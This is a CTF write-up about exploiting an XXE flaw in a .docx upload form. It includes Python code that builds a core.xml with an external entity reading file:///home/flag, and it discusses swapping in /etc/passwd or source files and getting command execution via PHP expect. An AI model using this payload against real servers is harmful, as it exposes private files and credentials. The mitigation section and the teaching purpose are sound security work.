Simon Saliba

Summary

The website content details a method for exploiting a web application's vulnerability using .docx files to gain unauthorized access to restricted server resources.

Abstract

The article discusses a security challenge encountered during the Web Security CTF competition organized by cybertalents.com. The author demonstrates how .docx files, which are essentially structured XML within a zip archive, can be manipulated to make the server disclose sensitive information, such as a hidden flag. The exploit involves understanding the .docx file structure, manipulating XML entities, and leveraging an XML External Entities (XXE) vulnerability to read files from outside the web server's root directory. The article emphasizes the danger of XXE vulnerabilities and provides recommendations for preventing such attacks, including using alternative data formats, updating XML processors, disabling external entity processing, and employing security tools like WAFs and IAST.

Opinions

  • The author expresses enthusiasm for sharing web security insights with fellow web development enthusiasts.
  • Initially, the author faced challenges in uploading non-.docx files due to the application's file validation mechanisms.
  • The author highlights the importance of understanding file structures (in this case, .docx) to exploit vulnerabilities effectively.
  • The article suggests that developers often overlook the security risks associated with XML parsing, particularly XXE vulnerabilities.
  • There is an emphasis on the need for developer training to recognize and mitigate XXE attacks.
  • The author advocates for proactive security measures, such as using dependency checkers and keeping libraries up to date.
  • The author implies that the severity of XXE vulnerabilities can lead to full system compromise if not addressed properly.

Using Word Documents or “.docx” files to gain unauthorised access to private server resources

I was happy to compete in the Web Security CTF organised by cybertalents.com between the 19th and the 21st of November 2020. I would love to share some learnings with web development enthusiasts like myself. This article demonstrates how .docx files can be abused to gain unauthorised access to sensitive resources on a server, like passwords or the website's source code.

The challenge I will present in this article is called “Notebook”. It is a simple webpage containing a form to upload MS Word documents (“.docx” files) to the server. On the right side of the form, the page renders three fields: title, subject and description. Under the form, there is a link to an empty “sample.docx” file that we can download. In practice, the user writes a note in a .docx file (the provided sample.docx can be used), uploads it to the server and sees the Title, Subject and Description of the note printed on the screen. On the server hosting this application, there is a hidden flag that we need to retrieve in order to complete the challenge.

Simple…

To check if there were any additional hidden routes aside from the main page, I made a simple request to /robots.txt, which revealed a file named “flag” in the /home/ directory. This is a hint that the flag is stored in that restricted directory. The challenge became clear: we need to use the upload form to make the server read the flag from /home/ and show it to us.

I started by trying to upload .txt, .php and .html files instead of Word documents to try to crash the application, but it only allowed .docx files. BAD LUCK! As a quick reaction, I decided to disguise .php files with a .docx extension. The app was smarter than expected: apparently, it was checking the file structure to verify documents, and not only the extension. After trying a lot of techniques to trick the server into accepting non-docx files and failing miserably, I came to the conclusion that we need to exploit the server using genuine MS Word documents.

The next obvious step is to understand what a .docx file is, and how it differs from formats like .doc and .txt. A .docx file is a zip archive containing a set of XML files. Unlike a plain .txt file, if you open a .docx in a text editor you will see a long stream of unreadable binary data, because the contents are compressed. The XML files inside the archive define the layout of the document, the fonts, the metadata, the content (text and photos) and many other properties. In other words, every .docx file is a zip file, but a zip file is a .docx only if it contains the XML parts that make up a Word document.

Let’s look closely inside a typical .docx file. I chose the sample.docx provided by the web application. On Mac/Linux, try:

% unzip [/path/to/]sample.docx -d [/path/to/]sample/
% cd [/path/to/]sample/
% ls -l

A “sample” directory is created, where we can see the contents of the decompressed .docx:

_rels/
customXml/
docProps/
word/
[Content_Types].xml
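The same inspection can be done without unzipping anything to disk. The sketch below uses Python's standard zipfile module; the helper names and the tiny stand-in archive are hypothetical and only mimic the layout listed above, they are not the challenge's sample.docx.

```python
import io
import zipfile


def list_docx_parts(docx_file) -> list[str]:
    """Return the names of all parts stored in a .docx (which is a ZIP archive).

    `docx_file` may be a filesystem path or a binary file-like object.
    """
    with zipfile.ZipFile(docx_file) as archive:
        return sorted(archive.namelist())


def build_demo_docx() -> io.BytesIO:
    """Build a tiny in-memory archive with a docx-like layout (placeholder content)."""
    buffer = io.BytesIO()
    with zipfile.ZipFile(buffer, "w", zipfile.ZIP_DEFLATED) as archive:
        archive.writestr("[Content_Types].xml", "<Types/>")
        archive.writestr("_rels/.rels", "<Relationships/>")
        archive.writestr("docProps/core.xml", "<coreProperties/>")
        archive.writestr("word/document.xml", "<document/>")
    buffer.seek(0)
    return buffer


if __name__ == "__main__":
    for part_name in list_docx_parts(build_demo_docx()):
        print(part_name)
```

Passing a real path such as "sample.docx" to list_docx_parts should list the parts of an actual document in the same way.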

Okay, so let’s get back to our web application and try to print something on the screen. Remember, on the right side of the form, three fields can be printed: Title, Subject and Description. For example, let’s write a note saying:

Title: Lunch
Subject: Restaurant Choice
Description: I feel like eating a burger today.

How would we go about this? Let’s open sample.docx, write exactly the above, save it and upload it to the server. Nothing shows on the screen. My first guess was that the server would look for the keywords “title, subject and description”, parse the input text accordingly and show the values on the screen. But the page is doing something different: whatever we write inside the .docx file using MS Word, nothing changes on the screen. So the web app must be reading “title, subject and description” from somewhere else INSIDE the .docx.

Using a simple text editor, I started to explore the unzipped sample.docx. After looking at all the XML files inside, I found what I needed in docProps/core.xml.
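For readers who have never opened one, a core.xml file looks roughly like the string embedded below. This is a sketch assuming the standard Office Open XML core-properties layout with the three fields left empty; it is not the exact file from the challenge, and read_note_fields is a hypothetical helper showing how a server might pull the three values out.

```python
import xml.etree.ElementTree as ET

# Namespaces used by the standard core-properties part of a .docx.
NS = {
    "cp": "http://schemas.openxmlformats.org/package/2006/metadata/core-properties",
    "dc": "http://purl.org/dc/elements/1.1/",
}

# Illustrative stand-in for docProps/core.xml (assumed layout, empty fields).
SAMPLE_CORE_XML = b"""<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<cp:coreProperties
    xmlns:cp="http://schemas.openxmlformats.org/package/2006/metadata/core-properties"
    xmlns:dc="http://purl.org/dc/elements/1.1/">
  <dc:title></dc:title>
  <dc:subject></dc:subject>
  <dc:description></dc:description>
</cp:coreProperties>
"""


def read_note_fields(core_xml: bytes) -> dict[str, str]:
    """Extract title, subject and description from a core.xml document."""
    root = ET.fromstring(core_xml)
    fields = {}
    for name in ("title", "subject", "description"):
        element = root.find(f"dc:{name}", NS)
        # A missing or empty element is reported as an empty string.
        fields[name] = (element.text or "") if element is not None else ""
    return fields


if __name__ == "__main__":
    print(read_note_fields(SAMPLE_CORE_XML))
```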

core.xml is the part where the core properties of sample.docx are defined. It contains the title, subject and description tags! Let’s write our Lunch note between the corresponding tags and save. We now need to convert the folder back into a .docx. From inside the sample directory:

% zip -r sample_updated.docx *

Uploading the new .docx now prints our note on the screen!
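The repacking step can also be scripted. The following is a minimal sketch using Python's standard zipfile module; repack_docx and demo are hypothetical helpers, and the demo works on placeholder files in a temporary directory rather than on the real sample.

```python
import os
import tempfile
import zipfile


def repack_docx(source_dir: str, output_path: str) -> list[str]:
    """Zip the contents of `source_dir` into `output_path`; return the part names.

    Paths are stored relative to `source_dir`, so [Content_Types].xml ends up
    at the archive root. Keep `output_path` outside `source_dir`, otherwise the
    archive would try to include itself.
    """
    written = []
    with zipfile.ZipFile(output_path, "w", zipfile.ZIP_DEFLATED) as archive:
        for folder, _subdirs, files in os.walk(source_dir):
            for filename in files:
                full_path = os.path.join(folder, filename)
                arcname = os.path.relpath(full_path, source_dir).replace(os.sep, "/")
                archive.write(full_path, arcname)
                written.append(arcname)
    return sorted(written)


def demo() -> list[str]:
    """Repack a placeholder folder and return what the archive contains."""
    with tempfile.TemporaryDirectory() as workdir:
        source_dir = os.path.join(workdir, "sample")
        os.makedirs(os.path.join(source_dir, "docProps"))
        with open(os.path.join(source_dir, "[Content_Types].xml"), "w") as handle:
            handle.write("<Types/>")
        with open(os.path.join(source_dir, "docProps", "core.xml"), "w") as handle:
            handle.write("<coreProperties/>")
        output_path = os.path.join(workdir, "sample_updated.docx")
        repack_docx(source_dir, output_path)
        with zipfile.ZipFile(output_path) as archive:
            return sorted(archive.namelist())


if __name__ == "__main__":
    print(demo())
```

Unlike the shell glob `*`, os.walk also picks up files whose names start with a dot, which matters if the archive contains parts such as `_rels/.rels`.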

The last part of our challenge is to print the content of /home/flag on the screen instead of the Lunch note.

/home/ is a restricted directory that lies outside the website directory (by default /var/www/website-name). This means we need a way to make the server read a file outside its web root and hand us the content of /home/flag.

This made me think of XXE, the XML External Entities vulnerability, which affects XML parsers that are configured to resolve external entities.

In XML documents, entities are constants that can be defined at the top of the file, inside a DOCTYPE declaration, and re-used anywhere in the file, just like constants in a programming language. We modify core.xml to declare a “title” entity whose value is “Hello World”, and we reference it between the title tags as &title;.

When the document is parsed, &title; is replaced by “Hello World”.
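An internal entity of this kind can be sketched as follows. The XML is an assumed reconstruction based on the description in the text (entity name “title”, value “Hello World”, referenced inside the title tag), not the author's exact file, and Python's ElementTree is used here only to show the expansion, since the challenge server's actual parser is not known.

```python
import xml.etree.ElementTree as ET

# Assumed reconstruction of core.xml with an internal "title" entity.
CORE_XML_WITH_ENTITY = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE coreProperties [
  <!ENTITY title "Hello World">
]>
<cp:coreProperties
    xmlns:cp="http://schemas.openxmlformats.org/package/2006/metadata/core-properties"
    xmlns:dc="http://purl.org/dc/elements/1.1/">
  <dc:title>&title;</dc:title>
</cp:coreProperties>
"""

# The parser replaces &title; with the value declared in the DOCTYPE.
root = ET.fromstring(CORE_XML_WITH_ENTITY)
title = root.find("{http://purl.org/dc/elements/1.1/}title").text
print(title)
```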

XML entities become dangerous when the XML parser is configured to allow them to refer to external resources, such as the contents of restricted files. Let’s try to exploit this in our case.

This time we declare a “flag” entity as an external (SYSTEM) entity that points to file:///home/flag, and we reference it as &flag; between the tags of one of the displayed fields. If we save the file, convert the folder back to .docx format and upload it to the server, we see the flag printed on the screen!
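A payload matching that description might be generated like this. It is a sketch under assumptions: build_xxe_core_xml is a hypothetical helper, the entity is placed in the title field (the text does not say which field was used), and the snippet only builds the XML string without parsing it or contacting any server.

```python
CORE_NS = "http://schemas.openxmlformats.org/package/2006/metadata/core-properties"
DC_NS = "http://purl.org/dc/elements/1.1/"


def build_xxe_core_xml(target_uri: str, entity_name: str = "flag") -> str:
    """Return a core.xml document whose title references an external entity.

    A parser that resolves external entities would replace the reference
    with the content of `target_uri`.
    """
    return f"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE coreProperties [
  <!ENTITY {entity_name} SYSTEM "{target_uri}">
]>
<cp:coreProperties xmlns:cp="{CORE_NS}" xmlns:dc="{DC_NS}">
  <dc:title>&{entity_name};</dc:title>
  <dc:subject></dc:subject>
  <dc:description></dc:description>
</cp:coreProperties>
"""


if __name__ == "__main__":
    print(build_xxe_core_xml("file:///home/flag"))
```

The resulting text would replace docProps/core.xml before the folder is zipped back into a .docx.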

This simple example shows how dangerous the XXE vulnerability really is. If we replace “file:///home/flag” with “file:///etc/passwd”, we can list the user accounts on the server (on most modern Linux systems the password hashes themselves are kept in /etc/shadow, which only root can read). With “file:///var/www/[securebank]/[transferfunds.php]”, we could get the website source code.

Moreover, if the PHP “expect” extension is loaded, we might be able to execute arbitrary commands on the server and compromise the entire system.

How to prevent XXE?

Developer training is essential to identify and mitigate XXE. Besides that, preventing XXE requires:

  • Whenever possible, use less complex data formats such as JSON, and avoid serialization of sensitive data.
  • Patch or upgrade all XML processors and libraries in use by the application or on the underlying operating system. Use dependency checkers. Update SOAP to SOAP 1.2 or higher.
  • Disable XML external entity and DTD processing in all XML parsers in the application.
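As an illustration of the last point, the sketch below refuses any uploaded XML that carries a DOCTYPE declaration before it is parsed. It assumes a Python backend and uses only the standard library; parse_without_dtd and DTDForbidden are hypothetical names, and the challenge server's real stack is not known. In practice, a maintained hardening library such as defusedxml is a common choice for this job.

```python
import xml.etree.ElementTree as ET
import xml.parsers.expat


class DTDForbidden(ValueError):
    """Raised when an XML document contains a DOCTYPE declaration."""


def _refuse_doctype(name, system_id, public_id, has_internal_subset):
    # Entities can only be declared inside a DTD, so rejecting the DOCTYPE
    # rules out both internal and external entity tricks.
    raise DTDForbidden(f"DOCTYPE declarations are not allowed (found {name!r})")


def parse_without_dtd(data: bytes) -> ET.Element:
    """Parse `data`, rejecting documents that declare a DTD."""
    checker = xml.parsers.expat.ParserCreate()
    checker.StartDoctypeDeclHandler = _refuse_doctype
    checker.Parse(data, True)  # first pass: only looks for a DOCTYPE
    return ET.fromstring(data)  # second pass: build the element tree


if __name__ == "__main__":
    print(parse_without_dtd(b"<note><title>Lunch</title></note>").find("title").text)
    malicious = b'<!DOCTYPE n [<!ENTITY flag SYSTEM "file:///home/flag">]><n>&flag;</n>'
    try:
        parse_without_dtd(malicious)
    except DTDForbidden as error:
        print("rejected:", error)
```

Parsing twice costs some time, but it keeps the check independent of the parser that later consumes the document.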

Other methods involve the usage of virtual patching, API security gateways, Web Application Firewalls (WAF), or Interactive Application Security Testing (IAST) tools to detect, monitor, and block XXE attacks.
